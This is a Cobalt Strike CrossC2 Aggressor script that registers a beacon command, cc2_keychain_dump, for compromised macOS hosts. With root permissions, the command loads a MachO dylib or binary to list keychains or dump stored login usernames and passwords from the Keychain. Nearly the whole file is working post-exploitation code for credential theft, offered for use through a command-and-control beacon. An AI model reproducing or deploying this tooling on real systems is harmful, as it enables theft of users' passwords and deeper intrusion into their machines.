
# include(script_resource("CrossC2Kit.cna"));

sub printUsage_keychain_dump {
    blog($1, "\nUsage: cc2_keychain_dump <keychain file>/<list>\n\tneed root permissions.\n\tdump login username & password from Keychain.\nEx:\n\tcc2_keychain_dump list\n\tcc2_keychain_dump /User/target/Library/Keychains/login.keychain {default}");
}

sub cc2_keychain_dump {
    $taskName = "cc2_keychain_dump"; # taskName
    $taskType = "MachO";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info"; # keystrokes -> keylogger message

    $beaconid = $1;
    $keychain = $2;
    $transportArg = $keychain."^".$3;

    if ($keychain) {
        if ($keychain eq "list") {
            $loadlib = "gather/keychain/cc2_keychain_list.dylib";
            blog($beaconid, "cc2_keychain_dump: list");
            bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
        } else {
            $loadlib = "gather/keychain/cc2_keychain_dump";
            blog($beaconid, "cc2_keychain_dump: ");
            bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
        }
    } else {
        printUsage_keychain_dump($beaconid);
    }

}

ssh_alias("cc2_keychain_dump", &cc2_keychain_dump);

ssh_command_register("cc2_keychain_dump", "CrossC2 Keychain dump (root) - dump login username & password from Keychain.", "\nUsage: cc2_keychain_dump <keychain file>/<list>\n\tneed root permissions.\n\tdump login username & password from Keychain.\nEx:\n\tcc2_keychain_dump list\n\tcc2_keychain_dump /User/target/Library/Keychains/login.keychain {default}");



sub openKeychainDumpDialogCallBack {
}

sub openKeychainDumpDialog {
}


sub cc2_keychain_dump_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}